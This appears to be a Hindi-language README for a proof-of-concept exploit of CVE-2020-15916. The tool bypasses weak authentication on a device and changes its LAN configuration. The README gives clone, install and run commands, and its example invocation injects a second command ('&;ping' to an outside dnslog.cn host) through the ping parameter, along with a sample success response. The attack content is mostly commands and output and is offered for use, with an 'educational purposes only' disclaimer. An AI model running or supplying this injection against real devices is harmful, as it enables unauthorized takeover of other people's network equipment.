
CVE-2020-15916 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, कमजोर प्रमाणीकरण बायपास और पेलोड इंजेक्शन के माध्यम से अनधिकृत LAN कॉन्फ़िगरेशन परिवर्तन सक्षम करता है।
GenLANConfigAttack - एक PoC है जो CVE-2020-15916 का शोषण करने के लिए है, एक ऐसी भेद्यता जो डिवाइस की LAN कॉन्फ़िगरेशन में अनधिकृत परिवर्तनों की अनुमति देती है।
git clone https://github.com/geniuszly/CVE-2020-15916
pip install -r requirements.txt
python GenLANConfigAttack.py
target_ip: लक्ष्य डिवाइस का IP पता।ping_command: लक्ष्य डिवाइस पर निष्पादित करने के लिए कमांड।session_password: सत्र पहुँच के लिए पासवर्ड।python GenLANConfigAttack.py --target_ip 192.168.0.1 --session_password gew43t4gtewe4u5u576i7yhggerr6ijtr --ping_command '192.168.0.1 &;ping xt68nd.dnslog.cn'
[192.168.0.1 से प्रतिक्रिया]:
{"success":true,"message":"LAN IP कॉन्फ़िगरेशन सफलतापूर्वक अपडेट हुआ"}
यह PoC CVE-2020-15916 भेद्यता के लिए है, जो हमलावरों को कमजोर प्रमाणीकरण तंत्र का शोषण करके कमजोर उपकरणों की LAN कॉन्फ़िगरेशन को बदलने की अनुमति देता है।
यह उपकरण केवल शैक्षिक उद्देश्यों के लिए प्रदान किया गया है। इसका जिम्मेदारी से उपयोग करें और केवल उन वातावरणों में जहाँ आपके पास स्पष्ट अनुमति हो।